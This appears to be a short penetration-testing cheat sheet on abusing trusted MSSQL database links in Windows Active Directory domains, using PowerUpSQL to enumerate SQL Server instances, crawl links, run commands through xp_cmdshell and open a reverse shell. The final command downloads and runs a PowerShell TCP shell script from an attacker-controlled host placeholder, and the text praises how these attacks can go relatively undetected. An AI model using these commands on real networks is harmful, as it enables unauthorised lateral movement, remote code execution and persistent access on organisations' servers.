MSSQL Server Trust Abuse
Within Windows domains, plenty of servers deploy MSSQL, often on their own servers with users from other servers often connect to. If a domain has a SQL Server, it provides an excellent opportunity for lateral movement in a domain as domain users can be mapped to database roles.
What we can also take advantage are database links. Often, SQL Servers within a network are accessible to each other and the links between the different databases provide a unique way for us to traverse within the Active Directory network by indirectly being able to execute commands without leaving our current station. It works not only between domain trusts in a forest, but between separate forests as well.
These attacks can also go relatively undetected because of the fact you can execute commands on distant SQL Servers from your own machine.
Enumeration
We can use PowerUPSQL.ps1 to use to enumerate SQL Servers.
Finding Instances From SQL Servers That Have an SPN with the Domain Controller and Discovering Logon Sessions
Get-SQLInstanceDomain
Finding Accessible SQL Servers
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
Retrieve Basic Server and Information From Target SQL Servers For Each Instance
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Searching Database Links
Get-SQLServerLink -Instance <sql_server_domain> -Verbose
# Crawling downfield database links from a SQL Server you can access
Get-SQLServerLinkCrawl -Instance <sql_server_domain> -Verbose
Now We Can Execute Commands
Check the results next to the 'CustomQuery' header
Get-SQLServerLinkCrawl -Instance <sql_server_instance> -Query "exec master..xp_cmdshell 'whoami'"
Get a Reverse Shell
Get-SQLServerLinkCrawl -Instance <sql_server_instance> -Query "exec master..xp_cmdshell 'powershell.exe iex(New-Object Net.WebClient).downloadString(''http://<ip:port>/Invoke-PowerShellTcp.ps1'')'"
Last updated